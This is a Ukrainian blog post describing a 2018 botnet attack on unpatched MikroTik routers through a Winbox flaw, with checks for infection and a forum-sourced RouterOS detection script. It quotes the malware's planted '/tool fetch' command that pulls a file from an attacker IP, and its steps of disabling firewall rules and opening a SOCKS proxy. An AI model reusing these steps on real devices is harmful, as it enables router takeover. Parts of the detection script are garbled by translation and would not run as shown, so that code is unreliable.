Нова уразливість Mikrotik? Немає, але варто перевірити свої пристрої

Другого серпня отримав розсилку “MikroTik: URGENT security advisory” про те, що якийсь ботнет використовує уразливість Winbox Service для злому і зараження пристроїв.

З тексту розсилки стало зрозуміло, що уразливість закрита ще 23 квітня 2018 року в версії v6.42.1. Почав перевіряти підшефні пристрою і знайшов кілька роутерів з 6.40.1, один з яких був заражений.

Що робить атакуючий скрипт?

  • Отримує список користувачів через уразливість (тобто зміна admin на щось інше не рятує).
  • Намагається зайти під усіма отриманими логінами і відсіває заблоковані.
  • Знайшовши активний логін, отримує пароль, заходить в систему.

Потім:

  • Відключає всі drop правила на файрволлі.
  • Включає socks (IP – Socks) на нестандартному порте, в моєму випадку 4145.
  • Скрипт додає /tool fetch address=95.154.216.166 port=2008 src-path=/mikrotik.php mode=http keep-result=no в System – Scripts
  • Додає запуск скрипта в System – Scheduler.
  • Видаляє існуючі скрипти (за повідомленнями на форумі Mikrotik).

Атака йшла з адреси 95.154.216.151, який належить iomart Hosting Limited, написав їм повідомлення через сайт, але жодної реакції поки немає, адреса активний.

Адреса 95.154.216.166 так само активний, але файлу mikrotik.php на ньому немає.

Ось тут можна побачити повідомлення від постраждалих:
www.abuseipdb.com/check/95.154.216.151
www.abuseipdb.com/check/95.154.216.166

Якщо ваш Mikrotik ще не оновлено і порт Winbox відкритий для всіх, обов’язково перевірте пристрій.

  1. Перевіряємо, що активні drop правила в IP – Firewall.
  2. Перевіряємо socks, повинен бути відключений і порт повинен бути за замовчуванням – 1080.
  3. Перевіряємо наявність лівих скриптів в System – Scripts і System Scheduler.
  4. Перевіряємо наявність файлу miktorik.php
  5. Робимо /export у терміналі і перевіряємо конфігурацію очима.

Користувач gotsprings на форумі Mikrotik запропонував такий варіант перевірки:

:if ([/ip сокет get port] = 1080) do={:log info "Socks port is still Default."} else={:log info "Socks Port changed Possible infection!"}
:if ([/ip сокет get enabled] = false) do={:log info "Socks is not on."} else={:log info "Socks is enabled... that could be bad!"}
:if ([:len [/find file name="mikrotik.php"]] > 0) do={:log info "!!!mikrotik.php!!! File Detected!"} else={:log info "mikrotik.php not found."}
:if ([:len [/find file name="Mikrotik.php"]] > 0) do={:log info "!!!Mikrotik.php!!! File Detected!"} else={:log info "Mikrotik.php not found."}
:if ([:len [/find user name="service"]] > 0) do={:log info "!!!YOU WERE BREACHED!!!"} else={:log info "No sign of the service user."}

Open you log and look at the results. If you have a result with “!” you might have a problem.

Читайте також  Вивчаємо інтернет-маркетинг самостійно: понад 50 безкоштовних курсів

Очевидно, що дуже погано тримати відкритий для всіх Winbox Service, але в деяких випадках це трапляється, не забувайте оновлювати свої пристрої!

Посилання по темі:

forum.mikrotik.com/viewtopic.php?f=21&t=137572
thehackernews.com/2018/08/mikrotik-router-hacking.html

Степан Лютий

Обожнюю технології в сучасному світі. Хоча частенько і замислююся над тим, як далеко вони нас заведуть. Не те, щоб я прям і знаюся на ядрах, пікселях, коллайдерах і інших парсеках. Просто приходжу в захват від того, що може в творчому пориві вигадати людський розум.

You may also like...

1 Response

  1. StacyOweni сказав:

    Вот этого я ждал! Огромное спасибо!

Залишити відповідь

Ваша e-mail адреса не оприлюднюватиметься. Обов’язкові поля позначені *